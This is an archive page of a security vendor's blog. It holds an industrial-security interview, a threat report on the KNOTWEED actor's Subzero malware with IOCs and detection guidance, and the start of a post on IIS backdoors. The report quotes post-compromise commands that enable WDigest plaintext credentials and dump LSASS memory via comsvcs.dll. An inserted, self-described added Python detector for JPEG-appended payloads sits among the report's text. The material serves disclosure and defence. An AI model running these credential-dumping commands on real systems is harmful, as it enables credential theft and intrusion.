Archive for July, 2022

Anatomy of a Cloud-Service Security Update

July 28th, 2022

Our security teams around the world focus on identifying and mitigating security issues as soon as possible while minimizing customer disruption. One of the challenges of a traditional security update is ensuring customers apply the protections promptly. We recently discussed the work that goes into these updates in The Anatomy of a Security update. Cloud …


Industrial systems: What it takes to secure and staff them

July 28th, 2022

The security community is continuously changing, growing, and learning from each other to better position the world against cyberthreats. In the latest post of our Community Voices blog series, Microsoft Security Senior Product Marketing Manager Brooke Lynn Weenig talks with Patrick C. Miller, Chief Executive Officer (CEO) and owner of Ampere Industrial Security and the founder and former Director of the Energy Sector Security Consortium. The thoughts below reflect Patrick’s views, not the views of Patrick’s employer, and are not legal advice. In this blog post, Patrick talks about security and hiring challenges in the industrial security industry.

Brooke: How did you get into industrial security?

Patrick: My dad was in telecommunications, so I grew up with a wire in one hand and a flashlight in my teeth, crawling down dark holes full of asbestos and dust and running wires. I built a lot of analog phone systems, and even had a pair of pole spikes, a test set, and a hard hat. I have done everything from climbing poles and stringing line to wiring building-size main distribution frames (MDFs). I was a phone tech who programmed phone systems for most of my younger days. I had done a lot of the security components on the telecom side. Back then, there were a lot of things like long-distance fraud and voicemail access that had to be secure.

I was going to school for biology, with a focus on the botany and microbiology side, when I got a chance to touch the supervisory control and data acquisition (SCADA), operational technology (OT), and industrial control system (ICS) environments as a side job. I was working as a propagation manager for an exceptionally large commercial greenhouse operation, using my biology skills and doing technical stuff. I merged them together and automated a bunch of horticulture warehouse operations, including light, shade, temperature, water, and airflow management. That is where I got my toe in the water of programming and building in industrial environments.

Brooke: How did you grow your skills in the industrial security world?

Patrick: There were no security certificates or college courses in the late 1980s and early 1990s. I fell backward into operational security because of incident response. We had things like bulletin board systems. I had one of the first dial-up modems, and I would go through my university account and look up how to do something. I learned primarily through 2600: The Hacker Quarterly and hands-on success or failure from whatever tutorials were available back then.

Now, I specialize in ICS or OT. Whether it is water in a pipe, power on a wire, traffic on the street, boxes on a belt—it is all flow control. It is incredibly challenging but also very satisfying. At the end of the day, you know you helped keep the lights on, keep the water flowing, keep the gas moving, whatever it may be. Those are critical infrastructures.

Brooke: Why are industrial systems targeted in cyberattacks?

Patrick: Gas, water, electricity, food processing, and transportation are all very necessary. Civilization depends on these infrastructure services. If I am a ransomware operator or a criminal, I can hold your system hostage and since you know there is a quick and severe impact, there is a high likelihood you are going to pay me. They are a high-value target from a criminal aspect as well as from a nation-state or geopolitical perspective for the same reasons but different motivations.

Proprietary information is a target as well. If you have some product or manufacturing or a better way of doing something, I do not have to do the research and development (R&D) to compete with you. I can just steal all your data and do what you do better because I am not spending all the money on R&D and effort. For lots of varied reasons, they are high-value targets.

Brooke: What are the biggest challenges in securing industrial systems?

Patrick: With industrial systems, our biggest worry is our legacy environment because it is just old. Some of the components have been around 40 to 50 years. They are digital-ish and they have analog inputs, but they were not designed to be networked. They were designed to be in a closed system where you had to have physical access to them, but we networked them anyway. They are terribly insecure because the expectation was that these environments would never connect to anything else.

We are seeing a trend to not necessarily disconnect them, but rather connect them in smarter ways. And if you need access to these environments, you must jump through enormous amounts of pain to get an inbound connection. We are just isolating the heck out of it and finding ways to intelligently island or “turtle-mode” those environments so they can operate by themselves. That way, if you have a problem, you can still run the important stuff in an isolated, disconnected mode and you do not lose power, water, gas, or whatever it may be.

If there’s ransomware burning through your corporate environment, you can take your industrial environment and shut it off from the outside world so it can operate in “turtle mode.” However, costs go up. Isolation is expensive and extra architecture is expensive. There are a ton of challenges, both financially and operationally, in trying to move toward a more defendable architecture than we had.

Brooke: What else can enterprises do to protect themselves from these security risks?

Patrick: I have done multiple presentations on if you can only do some things, do these things. They may sound simple, but they are often not easily done in industrial environments:

  • Do asset inventory. If you do not know what you have, you do not know what to protect because you do not even know that exists.
  • Get rid of any of those fragile systems. Like if it is under someone’s desk and critical but you cannot replace it because you do not know how, that is a huge risk. Find a way to replace it with something new that you can defend.
  • Design a network you can defend. Get it to a place where you can truly isolate it with no dependencies.
  • Lock down remote access. Attacks usually come from the IT side.
  • Have effective change management.
  • Practice incident response like it is game day.
  • Train your people and give them what they need to operate that environment and the time to do it.

Brooke: How can industrial security leaders attract more talent?

Patrick: I do not think there is a skills gap. There are a lot of people out there who would do and can do this job if we figure out how to characterize it well. You do not need to be a programmer or a cybersecurity expert to learn this stuff. It involves systems, connected in certain ways, and doing things in very methodical and predictable methods. It is not something outside the norm for most technical minds.

I typically see no entry-level path to get people into the industry. Your expectation is you are going to hire somebody who is a junior and needs 5 to 10 years of experience even as a junior. A lot of these job descriptions are entirely unrealistic. I see job descriptions where they are asking for more experience on a platform than that platform has existed. There are a lot of people you could get who have basic skills and you train them for a week or two. They are going to be hungry to show you what they can do and just grow from there.

Brooke: What skills do industry security professionals need to be successful?

Patrick: Industrial security sounds harder than it really is. When I train people, we break it down into these simple, bite-sized pieces and little breadcrumbs of steps. At the end of the day, they say, “Wow, that was way simpler than I had thought it was.” There is this mysterious cloud about cybersecurity, but it is just lots of small parts. You just must learn what all the parts are and what the acronyms are. Once it is described in a real-world kind of application, most people pick it up quickly.

Most of it is they must be curious enough. Empathy is another because to secure a system, you must have some empathy for what you are doing and why it is important. In the IT and OT world, you have engineering folks, and they just want the thing to work. If there is an alarm going off on their screen and they must react and click something, they do not want their screen to lock them out so they cannot click that button, which in some cases could cause the plant to have big problems. You must have enough empathy for their situation and what they need, and then, as a security professional, design around that so they can still have those things but in a more secure way. If you can be detail-oriented and have strong curiosity and empathy, you can succeed in this space.

Learn more

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Industrial systems: What it takes to secure and staff them appeared first on Microsoft Security Blog.

Untangling KNOTWEED: European private-sector offensive actor using 0-day exploits

The Microsoft Threat Intelligence Center (MSTIC) and the Microsoft Security Response Center (MSRC) found a private-sector offensive actor (PSOA) using multiple Windows and Adobe 0-day exploits, including one for the recently patched CVE-2022-22047, in limited and targeted attacks against European and Central American customers. The PSOA, which MSTIC tracks as KNOTWEED, developed malware called Subzero which was used in these attacks.

This blog details Microsoft’s analysis of the observed KNOTWEED activity and related malware used in targeted attacks against our customers. This information is shared with our customers and industry partners to improve detection of these attacks. Customers are encouraged to expedite deployment of the July 2022 Microsoft security updates to protect their systems against exploits using CVE-2022-22047. Microsoft Defender Antivirus and Microsoft Defender for Endpoint have also implemented detections against KNOTWEED’s malware and tools.

PSOAs, which Microsoft also refers to as cyber mercenaries, sell hacking tools or services through a variety of business models. Two common models for this type of actor are access-as-a-service and hack-for-hire. In access-as-a-service, the actor sells full end-to-end hacking tools that can be used by the purchaser in operations, with the PSOA not involved in any targeting or running of the operation. In hack-for-hire, detailed information is provided by the purchaser to the actor, who then runs the targeted operations. Based on observed attacks and news reports, MSTIC believes that KNOTWEED may blend these models: they sell the Subzero malware to third parties but have also been observed using KNOTWEED-associated infrastructure in some attacks, suggesting more direct involvement.


KNOTWEED is an Austria-based PSOA named DSIRF. The DSIRF website [web archive link] says they provide services “to multinational corporations in the technology, retail, energy and financial sectors” and that they have “a set of highly sophisticated techniques in gathering and analyzing information.” They publicly offer several services including “an enhanced due diligence and risk analysis process through providing a deep understanding of individuals and entities” and “highly sophisticated Red Teams to challenge your company’s most critical assets.”

However, multiple news reports have linked DSIRF to the development and attempted sale of a malware toolset called Subzero. MSTIC found the Subzero malware being deployed through a variety of methods, including 0-day exploits in Windows and Adobe Reader, in 2021 and 2022. As part of our investigation into the utility of this malware, Microsoft’s communications with a Subzero victim revealed that they had not commissioned any red teaming or penetration testing, and confirmed that it was unauthorized, malicious activity. Observed victims to date include law firms, banks, and strategic consultancies in countries such as Austria, the United Kingdom, and Panama. It’s important to note that the identification of targets in a country doesn’t necessarily mean that a DSIRF customer resides in the same country, as international targeting is common.

MSTIC has found multiple links between DSIRF and the exploits and malware used in these attacks. These include command-and-control infrastructure used by the malware directly linking to DSIRF, a DSIRF-associated GitHub account being used in one attack, a code signing certificate issued to DSIRF being used to sign an exploit, and other open-source news reports attributing Subzero to DSIRF.

Observed actor activity

KNOTWEED initial access

MSTIC found KNOTWEED’s Subzero malware deployed in a variety of ways. In the succeeding sections, the different stages of Subzero are referred to by their Microsoft Defender detection names: Jumplump for the persistent loader and Corelump for the main malware.

KNOTWEED exploits in 2022

In May 2022, MSTIC found an Adobe Reader remote code execution (RCE) and a 0-day Windows privilege escalation exploit chain being used in an attack that led to the deployment of Subzero. The exploits were packaged into a PDF document that was sent to the victim via email. Microsoft was not able to acquire the PDF or Adobe Reader RCE portion of the exploit chain, but the victim’s Adobe Reader version was released in January 2022, meaning that the exploit used was either a 1-day exploit developed between January and May, or a 0-day exploit. Based on KNOTWEED’s extensive use of other 0-days, we assess with medium confidence that the Adobe Reader RCE is a 0-day exploit. The Windows exploit was analyzed by MSRC, found to be a 0-day exploit, and then patched in July 2022 as CVE-2022-22047. Interestingly, there were indications in the Windows exploit code that it was also designed to be used from Chromium-based browsers, although we’ve seen no evidence of browser-based attacks.

The CVE-2022-22047 vulnerability is related to an issue with activation context caching in the Client Server Run-Time Subsystem (CSRSS) on Windows. At a high level, the vulnerability could enable an attacker to provide a crafted assembly manifest, which would create a malicious activation context in the activation context cache, for an arbitrary process. This cached context is used the next time the process is spawned.

CVE-2022-22047 was used in KNOTWEED related attacks for privilege escalation. The vulnerability also provided the ability to escape sandboxes (with some caveats, as discussed below) and achieve system-level code execution. The exploit chain starts with writing a malicious DLL to disk from the sandboxed Adobe Reader renderer process. The CVE-2022-22047 exploit was then used to target a system process by providing an application manifest with an undocumented attribute that specified the path of the malicious DLL. Then, when the system process next spawned, the attribute in the malicious activation context was used, the malicious DLL was loaded from the given path, and system-level code execution was achieved.

It’s important to note that exploiting CVE-2022-22047 requires attackers to be able to write a DLL to disk. However, in the threat model of sandboxes, such as that of Adobe Reader and Chromium, the ability to write out files where the attacker cannot control the path isn’t considered dangerous. Hence, these sandboxes aren’t a barrier to the exploitation of CVE-2022-22047.

KNOTWEED exploits in 2021

In 2021, MSRC received a report of two Windows privilege escalation exploits (CVE-2021-31199 and CVE-2021-31201) being used in conjunction with an Adobe Reader exploit (CVE-2021-28550), all of which were patched in June 2021. MSTIC was able to confirm the use of these in an exploit chain used to deploy Subzero.

We were later able to link the deployment of Subzero to a fourth exploit, one related to a Windows privilege escalation vulnerability in the Windows Update Medic Service (CVE-2021-36948), which allowed an attacker to force the service to load an arbitrary signed DLL. The malicious DLL used in the attacks was signed by ‘DSIRF GmbH’.

A screenshot of the digital signature details tab from the file properties page. The tab states that the digital signature for the file is OK. The name indicated under the signer information portion is DSIRF GmbH.
Figure 1. Valid digital signature from DSIRF on Medic Service exploit DLL

Malicious Excel documents

In addition to the exploit chains, another method of access that led to the deployment of Subzero was an Excel file masquerading as a real estate document. The file contained a malicious macro that was obfuscated with large chunks of benign comments from the Kama Sutra, string obfuscation, and use of Excel 4.0 macros.

Two screenshots of macro code snippet, presenting different examples of how the macro is obfuscated to evade detection. In the first code snippet, text from the Kama Sutra is inserted among the macro code. The second code snippet presents the code of a function where the attacker uses Excel 4 macro for obfuscation.
Figure 2: Two examples of KNOTWEED Excel macro obfuscation

After de-obfuscating strings at runtime, the VBA macro uses the ExecuteExcel4Macro function to call native Win32 functions to load shellcode into memory allocated using VirtualAlloc. Each opcode is individually copied into a newly allocated buffer using memset before CreateThread is called to execute the shellcode.

A screenshot of a code snippet where the malware copies opcode to a newly allocated buffer.
Figure 3: Copying opcodes
A screenshot of a code snippet where the malware calls the CreateThread function to execute the shellcode.
Figure 4: Calling CreateThread on shellcode

The following section describes the shellcode executed by the macro.

KNOTWEED malware and tactics, techniques, and procedures (TTPs)

Corelump downloader and loader shellcode

The downloader shellcode is the initial shellcode executed from either the exploit chains or malicious Excel documents. The shellcode’s purpose is to retrieve the Corelump second-stage malware from the actor’s command-and-control (C2) server. The downloader shellcode downloads a JPEG image that contains extra encrypted data appended to the end of the file (past the 0xFF 0xD9 marker that signifies the end of a JPEG file). The JPEG is then written to the user’s %TEMP% directory.

Figure 5: One of the images embedded with the loader shellcode and Corelump

The downloader shellcode searches for a 16-byte marker immediately following the end of JPEG. After finding the marker, the downloader shellcode RC4 decrypts the loader shellcode using the next 16 bytes as the RC4 key. Finally, the loader shellcode RC4 decrypts the Corelump malware using a second RC4 key and manually loads it into memory.
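The layout described above (a valid JPEG, then a 16-byte marker, then a 16-byte RC4 key, then the encrypted loader) gives defenders a cheap triage check: a JPEG that carries a meaningful amount of data past its end-of-image marker. The following is an added example, not code from the post or from Microsoft. It walks the JPEG segment structure instead of searching for the first 0xFF 0xD9, because embedded thumbnails (EXIF APP1) carry their own SOI/EOI pair and would otherwise cause a false split. The sample images are constructed inline; the marker and key bytes in the constructed stager sample are placeholders, not KNOTWEED's actual values.

```python
import struct

SOI, EOI, SOS = 0xD8, 0xD9, 0xDA
# Markers that carry no length field: SOI, EOI, TEM (0x01) and RST0..RST7.
NO_LENGTH = {SOI, EOI, 0x01} | set(range(0xD0, 0xD8))


def find_jpeg_end(data: bytes) -> int:
    """Return the offset just past the EOI marker of the outermost JPEG in data.

    Segments are walked by their length fields, and entropy-coded scan data is
    skipped while honouring byte stuffing (0xFF 0x00) and restart markers, so an
    EOI inside an embedded thumbnail is not mistaken for the real end of image.
    """
    if len(data) < 4 or data[0] != 0xFF or data[1] != SOI:
        raise ValueError("not a JPEG: missing SOI")
    pos = 2
    while pos + 1 < len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected marker at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xFF:            # fill byte ahead of a marker
            pos += 1
            continue
        if marker == EOI:
            return pos + 2
        if marker in NO_LENGTH:
            pos += 2
            continue
        if pos + 4 > len(data):
            break
        (seg_len,) = struct.unpack(">H", data[pos + 2:pos + 4])
        pos += 2 + seg_len            # length field counts itself
        if marker == SOS:
            # Scan data runs until a marker other than stuffed 0xFF00, fill 0xFFFF or RSTn.
            while pos + 1 < len(data):
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt not in (0x00, 0xFF) and not 0xD0 <= nxt <= 0xD7:
                    break
                pos += 1
    raise ValueError("truncated JPEG: no EOI found")


def trailing_data(data: bytes) -> bytes:
    """Bytes appended after the JPEG's EOI marker (empty for a clean file)."""
    return data[find_jpeg_end(data):]


def looks_like_stager(data: bytes, min_trailer: int = 32) -> bool:
    """True when at least marker (16) + RC4 key (16) bytes follow the EOI.

    This is a triage heuristic: some legitimate writers append a few trailing
    bytes, so a hit is a reason to inspect the file, not proof of Corelump.
    """
    return len(trailing_data(data)) >= min_trailer


# Constructed minimal JPEG: SOI, JFIF APP0, SOS with a few bytes of scan data
# (including a stuffed 0xFF00 and an RST0), then EOI. 39 bytes in total.
CLEAN_JPEG = (
    b"\xFF\xD8"
    + b"\xFF\xE0\x00\x10" + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    + b"\xFF\xDA\x00\x08" + b"\x01\x01\x00\x00\x3F\x00"
    + b"\x12\xFF\x00\x34\xFF\xD0\x56"
    + b"\xFF\xD9"
)
# Same image with an EXIF-style APP1 segment whose payload contains its own SOI/EOI pair,
# as a thumbnail would; a naive search for 0xFF 0xD9 stops inside this segment.
THUMBNAIL_JPEG = CLEAN_JPEG[:2] + b"\xFF\xE1\x00\x0C" + b"Exif\x00\x00\xFF\xD8\xFF\xD9" + CLEAN_JPEG[2:]
# Constructed stager-style sample: placeholder 16-byte marker, placeholder 16-byte key,
# then 40 bytes standing in for the RC4-encrypted loader.
STAGER_SAMPLE = CLEAN_JPEG + b"M" * 16 + b"K" * 16 + b"\x00" * 40


if __name__ == "__main__":
    for name, blob in (("clean", CLEAN_JPEG), ("thumbnail", THUMBNAIL_JPEG), ("stager", STAGER_SAMPLE)):
        print(f"{name}: {len(trailing_data(blob))} trailing bytes, suspicious={looks_like_stager(blob)}")
```

Run over files written to %TEMP% with an image extension, the check complements the hash IOCs listed later in the post: the hashes identify known samples, while the trailer check catches the technique regardless of which image the actor chose.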

Corelump malware

Corelump is the main payload and resides exclusively in memory to evade detection. It contains a variety of capabilities including keylogging, capturing screenshots, exfiltrating files, running a remote shell, and running arbitrary plugins downloaded from KNOTWEED’s C2 server.

As part of installation, Corelump makes copies of legitimate Windows DLLs and overwrites sections of them with malicious code. As part of this process, Corelump also modifies the fields in the PE header to accommodate the nefarious changes, such as adding new exported functions, disabling Control Flow Guard, and modifying the image file checksum with a computed value from CheckSumMappedFile. These trojanized binaries (Jumplump) are dropped to disk in C:\Windows\System32\spool\drivers\color\, and COM registry keys are modified for persistence (see the Behaviors section for more information on COM hijacking).

Jumplump loader

Jumplump is responsible for loading Corelump into memory from the JPEG file in the %TEMP% directory. If Corelump is not present, Jumplump attempts to download it again from the C2 server. Both Jumplump and the downloader shellcode are heavily obfuscated to make analysis difficult, with most instructions being followed by a jmp to another instruction/jmp combination, giving a convoluted control flow throughout the program.

A screenshot of assembly code presenting the jmp/instruction obfuscation used in Jumplump malware.
Figure 6: Disassembly showing the jmp/instruction obfuscation used in Jumplump

Mex and PassLib

KNOTWEED was also observed using the bespoke utility tools Mex and PassLib. These tools are developed by KNOTWEED and bear capabilities that are derived from publicly available sources. Mex, for example, is a command-line tool containing several red teaming or security plugins copied from GitHub (listed below):

  • Chisel
  • Curl
  • Grouper2
  • Internal Monologue
  • Inveigh
  • Lockless
  • mimikatz
  • Ping Castle
  • Rubeus
  • SCShell
  • Seatbelt
  • SharpExec
  • SharpHound3
  • SharpOxidResolver
  • SharpPrinter
  • SpoolSample
  • StandIn

PassLib is a custom password stealer tool capable of dumping credentials from a variety of sources including web browsers, email clients, LSASS, LSA secrets, and the Windows credential manager.

Post-compromise actions

In victims where KNOTWEED malware had been used, a variety of post-compromise actions were observed:

  • Setting of UseLogonCredential to “1” to enable plaintext credentials:
    • reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
  • Credential dumping via comsvcs.dll:
    • rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump
  • Attempt to access emails with dumped credentials from a KNOTWEED IP address
  • Using Curl to download KNOTWEED tooling from public file shares such as vultrobjects[.]com
  • Running PowerShell scripts directly from a GitHub gist created by an account associated with DSIRF

KNOTWEED infrastructure connections to DSIRF

Pivoting off a known command-and-control domain identified by MSTIC, acrobatrelay[.]com, RiskIQ expanded the view of KNOTWEED’s attack infrastructure. Leveraging unique patterns in the use of SSL certificates and other network fingerprints specific to the group and associated with that domain, RiskIQ identified a host of additional IP addresses under the control of KNOTWEED. This infrastructure, largely hosted by Digital Ocean and Choopa, has been actively serving malware since at least February of 2020 and continues through the time of this writing.

RiskIQ next utilized passive DNS data to determine which domains those IPs resolved to at the time they were malicious. This process yielded several domains with direct links to DSIRF, including demo3[.]dsirf[.]eu (the company’s own website), and several subdomains that appear to have been used for malware development, including debugmex[.]dsirflabs[.]eu (likely a server used for debugging malware with the bespoke utility tool Mex) and szstaging[.]dsirflabs[.]eu (likely a server used to stage Subzero malware).

Detection and prevention

Microsoft will continue to monitor KNOTWEED activity and implement protections for our customers. The current detections and IOCs detailed below are in place and protecting Microsoft customers across our security products. Additional advanced hunting queries are also provided below to help organizations extend their protections and investigations of these attacks.


Corelump drops the Jumplump loader DLLs to C:\Windows\System32\spool\drivers\color\. This is a common directory used by malware as well as some legitimate programs, so writes of PE files to the folder should be monitored.

Jumplump uses COM hijacking for persistence, modifying COM registry keys to point to the Jumplump DLL in C:\Windows\System32\spool\drivers\color\. Modifications of default system CLSID values should be monitored to detect this technique (e.g., HKLM\SOFTWARE\Classes\CLSID\{GUID}\InProcServer32 Default value). The five CLSIDs used by Jumplump are listed below with their original clean values on Windows 11:

  • {ddc05a5a-351a-4e06-8eaf-54ec1bc2dcea} = %SystemRoot%\System32\ApplicationFrame.dll
  • {1f486a52-3cb1-48fd-8f50-b8dc300d9f9d} = %SystemRoot%\system32\propsys.dll
  • {4590f811-1d3a-11d0-891f-00aa004b2e24} = %SystemRoot%\system32\wbem\wbemprox.dll
  • {4de225bf-cf59-4cfc-85f7-68b90f185355} = %SystemRoot%\system32\wbem\wmiprvsd.dll
  • {F56F6FDD-AA9D-4618-A949-C1B91AF43B1A} = %SystemRoot%\System32\Actioncenter.dll

Many of the post-compromise actions can be detected based on their command lines. Customers should monitor for possible malicious activity such as PowerShell executing scripts from internet locations, modification of commonly abused registry keys such as HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest, and LSASS credential dumping via minidumps.

Recommended customer actions

The techniques used by the actor and described in the Observed actor activity section can be mitigated by adopting the security considerations provided below:

  • All customers should prioritize patching of CVE-2022-22047.
  • Confirm that Microsoft Defender Antivirus is updated to security intelligence update 1.371.503.0 or later to detect the related indicators.
  • Use the included indicators of compromise to investigate whether they exist in your environment and assess for potential intrusion.
  • Change Excel macro security settings to control which macros run and under what circumstances when you open a workbook. Customers can also stop malicious XLM or VBA macros by ensuring runtime macro scanning by Antimalware Scan Interface (AMSI) is on. This feature—enabled by default—is on if the Group Policy setting for Macro Run Time Scan Scope is set to “Enable for All Files” or “Enable for Low Trust Files”.
  • Enable multifactor authentication (MFA) to mitigate potentially compromised credentials and ensure that MFA is enforced for all remote connectivity. Note: Microsoft strongly encourages all customers to download and use password-less solutions like Microsoft Authenticator to secure accounts.
  • Review all authentication activity for remote access infrastructure, with a particular focus on accounts configured with single factor authentication, to confirm authenticity and investigate any anomalous activity.

Indicators of compromise (IOCs)

The following list provides IOCs observed during our investigation. We encourage our customers to investigate these indicators in their environments and implement detections and protections to identify past related activity and prevent future attacks against their systems. All sample hashes are available in VirusTotal.

Indicator Type Description
78c255a98003a101fa5ba3f49c50c6922b52ede601edac5db036ab72efc57629 SHA-256 Malicious Excel document and VBA
0588f61dc7e4b24554cffe4ea56d043d8f6139d2569bc180d4a77cf75b68792f SHA-256 Malicious Excel document and VBA
441a3810b9e89bae12eea285a63f92e98181e9fb9efd6c57ef6d265435484964 SHA-256 Jumplump malware
cbae79f66f724e0fe1705d6b5db3cc8a4e89f6bdf4c37004aa1d45eeab26e84b SHA-256 Jumplump malware
fd6515a71530b8329e2c0104d0866c5c6f87546d4b44cc17bbb03e64663b11fc SHA-256 Jumplump malware
5d169e083faa73f2920c8593fb95f599dad93d34a6aa2b0f794be978e44c8206 SHA-256 Jumplump malware
7f29b69eb1af1cc6c1998bad980640bfe779525fd5bb775bc36a0ce3789a8bfc SHA-256 Jumplump malware
02a59fe2c94151a08d75a692b550e66a8738eb47f0001234c600b562bf8c227d SHA-256 Jumplump malware
7f84bf6a016ca15e654fb5ebc36fd7407cb32c69a0335a32bfc36cb91e36184d SHA-256 Jumplump malware
afab2e77dc14831f1719e746042063a8ec107de0e9730249d5681d07f598e5ec SHA-256 Jumplump malware
894138dfeee756e366c65a197b4dbef8816406bc32697fac6621601debe17d53 SHA-256 Jumplump malware
4611340fdade4e36f074f75294194b64dcf2ec0db00f3d958956b4b0d6586431 SHA-256 Jumplump malware
c96ae21b4cf2e28eec222cfe6ca903c4767a068630a73eca58424f9a975c6b7d SHA-256 Corelump malware
fa30be45c5c5a8f679b42ae85410f6099f66fe2b38eb7aa460bcc022babb41ca SHA-256 Mex tool
e64bea4032cf2694e85ede1745811e7585d3580821a00ae1b9123bb3d2d442d6 SHA-256 Passlib tool
acrobatrelay[.]com Domain C2
finconsult[.]cc Domain C2
realmetaldns[.]com Domain C2

NOTE: These indicators should not be considered exhaustive for this observed activity.


Microsoft Defender Antivirus

Microsoft Defender Antivirus detects the malware tools and implants used by KNOTWEED starting with signature build 1.371.503.0 as the following family names:

  • Backdoor:O97M/JumplumpDropper
  • Trojan:Win32/Jumplump
  • Trojan:Win32/Corelump
  • HackTool:Win32/Mexlib
  • Trojan:Win32/Medcerc
  • Behavior:Win32/SuspModuleLoad

Microsoft Defender for Endpoint

Microsoft Defender for Endpoint customers may see the following alerts as an indication of a possible attack. These alerts are not necessarily an indication of KNOTWEED compromise:

  • COM Hijacking – Detects multiple behaviors, including Jumplump malware persistence techniques.
  • Possible privilege escalation using CTF module – Detects a possible privilege escalation behavior associated with CVE-2022-22047; also detects an attempt to perform local privilege escalation by launching an elevated process and loading an untrusted module to perform malicious activities.
  • KNOTWEED actor activity detected – Detects KNOTWEED actor activities
  • WDigest configuration change – Detects potential retrieval of clear text password from changes to UseLogonCredential registry key
  • Sensitive credential memory read – Detects LSASS credential dumping via minidumps
  • Suspicious Curl behavior – Detects the use of Curl to download KNOTWEED tooling from public file shares
  • Suspicious screen capture activity – Detects Corelump behavior of capturing screenshots of the compromised system

Hunting queries

Microsoft Sentinel

The following resources are available to Microsoft Sentinel customers to identify the activity outlined in the blog post.

Microsoft Defender Antivirus detections related to KNOTWEED

This query identifies occurrences of Microsoft Defender Antivirus detections listed in this blog post:

File hash IOCs related to KNOTWEED

This query identifies matches based on file hash IOCs related to KNOTWEED across a range of common Microsoft Sentinel data sets:

Domain IOCs related to KNOTWEED

This query identifies matches based on domain IOCs related to KNOTWEED across a range of common Microsoft Sentinel data sets:

COM registry key modified to point to Color Profile folder

This query identifies modifications to COM registry keys to point to executable files in C:\Windows\System32\spool\drivers\color\:

PE file dropped in Color Profile folder

This query looks for PE files being created in the C:\Windows\System32\spool\drivers\color\ folder:

Abnormally large JPEG downloaded from new source

This query looks for downloads of JPEG files from remote sources, where the file size is abnormally large, and not from a common source:

Downloading new file using Curl

This query looks for new files being downloaded using Curl.

Suspected credential dumping

This query looks for attackers using comsvcs.dll to dump credentials from memory:

Downgrade to plaintext credentials

This query looks for the registry key being set to enable plaintext credentials:

Microsoft 365 Defender advanced hunting

Microsoft 365 Defender customers can run the following advanced hunting queries to locate IOCs and related malicious activity in their environments.

Microsoft Defender Antivirus detections related to KNOTWEED

This query identifies detection of related malware and tools by Microsoft Defender Antivirus:

File hash IOCs related to KNOTWEED

This query surfaces KNOTWEED file hash IOCs across Microsoft Defender for Endpoint tables:

Domain IOCs related to KNOTWEED

This query identifies matches based on domain IOCs related to KNOTWEED against Microsoft Defender for Endpoint device network connections:

COM registry key modified to point to Color Profile folder

This query identifies modifications to COM registry keys to point to executable files in C:\Windows\System32\spool\drivers\color\:

PE file dropped in Color Profile folder

This query looks for PE files being created in the C:\Windows\System32\spool\drivers\color\ folder:

Downloading new file using Curl

This query looks for new files being downloaded using Curl.

The post Untangling KNOTWEED: European private-sector offensive actor using 0-day exploits appeared first on Microsoft Security Blog.

Malicious IIS extensions quietly open persistent backdoors into servers

July 26th, 2022

Attackers are increasingly leveraging Internet Information Services (IIS) extensions as covert backdoors into servers, which hide deep in target environments and provide a durable persistence mechanism for attackers. While prior research has been published on specific incidents and variants, little is generally known about how attackers leverage the IIS platform as a backdoor.

Malicious IIS extensions are less frequently encountered in attacks against servers, with attackers often only using script web shells as the first stage payload. This leads to a relatively lower detection rate for malicious IIS extensions compared to script web shells. IIS backdoors are also harder to detect since they mostly reside in the same directories as legitimate modules used by target applications, and they follow the same code structure as clean modules. In most cases, the actual backdoor logic is minimal and cannot be considered malicious without a broader understanding of how legitimate IIS extensions work, which also makes it difficult to determine the source of infection.

Typically, attackers first exploit a critical vulnerability in the hosted application for initial access before dropping a script web shell as the first stage payload. At a later point in time, the attackers then install an IIS backdoor to provide highly covert and persistent access to the server. Attackers can also install customized IIS modules to fit their purposes, as we observed in a campaign targeting Exchange servers between January and May 2022, as well as in our prior research on the custom IIS backdoors ScriptModule.dll and App_Web_logoimagehandler.ashx.b6031896.dll. Once registered with the target application, the backdoor can monitor incoming and outgoing requests and perform additional tasks, such as running remote commands or dumping credentials in the background as the user authenticates to the web application.

As we expect attackers to continue to increasingly leverage IIS backdoors, it’s vital that incident responders understand the basics of how these attacks function to successfully identify and defend against them. Organizations can further improve their defenses with Microsoft 365 Defender, whose protection capabilities are informed by research like this and our unique visibility into server attacks and compromise. With critical protection features like threat and vulnerability management and antivirus capabilities, Microsoft 365 Defender provides organizations with a comprehensive solution that coordinates protection across domains, spanning email, identities, cloud, and endpoints.

In this blog post, we detail how IIS extensions work and provide insight into how they are being leveraged by attackers as backdoors. We also share some of our observations on the IIS threat landscape over the last year to help defenders identify and protect against this threat and prepare the larger security community for any increased sophistication. More specifically, the blog covers the following topics:

Understanding IIS extensions

IIS is a flexible, general-purpose web server that has been a core part of the Windows platform for many years now. As an easy-to-manage, modular, and extensible platform for hosting websites, services, and applications, IIS serves critical business logic for numerous organizations. The modular architecture of IIS allows users to extend and customize web servers according to their needs. These extensions can be written as native (C/C++) or managed (C#, VB.NET) code, with the latter being our focus in this blog post. The extensions can further be categorized as modules and handlers.

The IIS pipeline is a series of extensible objects that are initiated by the ASP.NET runtime to process a request. IIS modules and handlers are .NET components that serve as the main points of extensibility in the pipeline. Each request is processed by multiple IIS modules before being processed by a single IIS handler. Like a set of building blocks, modules and handlers are added to provide the desired functionality for the target application. In addition, handlers can be configured to respond to specific attributes of the request, such as the URL, file extension, and HTTP method. For example, Aspnet_isapi.dll is a pre-configured IIS handler for the common .aspx extension.

Creating custom managed IIS modules

To create a managed IIS module, the code must implement the IHttpModule interface. The IHttpModule interface has two methods with the following signatures: Init() and Dispose().

Figure 1. IIS module skeleton

Inside Init(), the module can synchronize with any number of HTTP events available in the request pipeline, listed here in sequential order:

  • BeginRequest
  • AuthenticateRequest
  • AuthorizeRequest
  • ResolveRequestCache
  • AcquireRequestState
  • PreRequestHandlerExecute
  • PostRequestHandlerExecute
  • ReleaseRequestState
  • UpdateRequestCache
  • EndRequest
  • PreSendRequestHeaders
  • PreSendRequestContent

